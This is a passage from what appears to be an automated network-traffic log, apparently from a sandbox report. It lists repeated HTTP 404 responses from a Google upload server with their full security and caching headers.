      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7EwYRVBp6qr8onz9Tm_tL8mSzwENjn1lTV_Ms1z6knp4-F-pIdwz8XkwKc2O5wTYgBY52iv7cContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:49 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-8-q204vIWcp3HGutWJqrmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5kzkOfdAfu5FCjSl-h6bQoB_VItSn9XKsKAYtmr9ZhSvBtBS-8m98JIkOQLFszKO1f5zrIRhgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:51 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-pnZPxG0TTaJ4s0ppOUnYZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT1336Dzzv5lecgHyhQMm_wJ-M8szZ2lg_9xVqyCggiiR3TDgWiCsUBUc0FSMq2P7dcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:54 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-uVFNRGEZeU1FJmar2Pt8fQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7MEz8qGqqy9_CAY0hZZEk_6DaWDzZD3V_6qbx1mOV-vRKab-_Xqp35SB8mfwM_W997iVMPgnEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:56 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce--SHLeh6vrOfDdfWC5G8ILg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4cSLty2WprZCEEgONWuTPD0bjwfVdnUxotEG-PUsvSrLC1l9phnn4R84iQIJc5CArdRNSj6TMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:58 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-EMWIIizxxDDemkPbflf8eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT8QAXtimtvdxAwHQsfme5sC9tRU0hJROS0VflVYYdYEGGKNEq3Xa_RgxZ4-t5YGDv3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:01 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-1NXQ3Wdh19Mzs9Lks2BCpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQATzvO-q68-mRamZCZS5XV8JcDs0riUGMs_cZRVDusMfiCSs48_kXZUeJWUDspptotContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:04 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-FKgAZquZlGMMqvVGgleGpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5mjSAuR8Thxp-9smvk96kNGK40X8btGfBdNMcUgyTdN12xMKMaMvec5PhG1XOs4VMzO8rGxcUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:06 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Ci_6wEgPZXsEHYUerXJV-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRrvNNLnozHOl3TQneTZwe218rq8qt8QDcqeiTxkhl7e8sHayV-9sy6HFtkN-P9alu3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:08 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ALzk0BOSUAxrAe8ogUiR5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTHqb2Bxgxnj4EusxEMhgDH2FhFGum8HKY__9I29zccfafUdvmbhGH_TNxNZxFKN8TfContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:11 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-2QVEF4r-ZKE4YJ0n4fgWYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgROTSJJSL0ZlC77uRTac3nOX8vNAr9LjKGd7QqTif49kzzyyMHGjtutIl4Kgjt7MnbwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:13 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-0yo4dHZnvQzCNKtoNc-idQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQZ6LPwJakbmMinfFdW2QRaCEixe4bs45r_8ku9enx8TZIKK1Yhu3ThCNBCukRZ79R-fo22TaMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:15 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-8I-59FeD5eKDnjMdeWxJWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC70_4k-dDXqvwrtCcAsEeyhoJn2tmg-sIqHOP5SJuce8Ote-VORupv3SoWJVjERqNOKd9Y-cKYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:17 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7bFvBGcDldPWi-3ykgX-Pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRWJDCPEBYHmPQZi1fSrhBOf-fh3LW4VeYHo902LxVVIvB_0TD3J_3HRTi7iQ9Gd-GzA_uv7r8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:20 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-n2Ibup2iGqG6vbuNSs6yuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS4QAcIbMVVkyTbs48hCOPEBIq15VIKR0gKasEHkeQsy8txvoijF-710yvs-_YPZPiZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:22 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Vl-VsQ_AA_8cARbWBqSpAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; 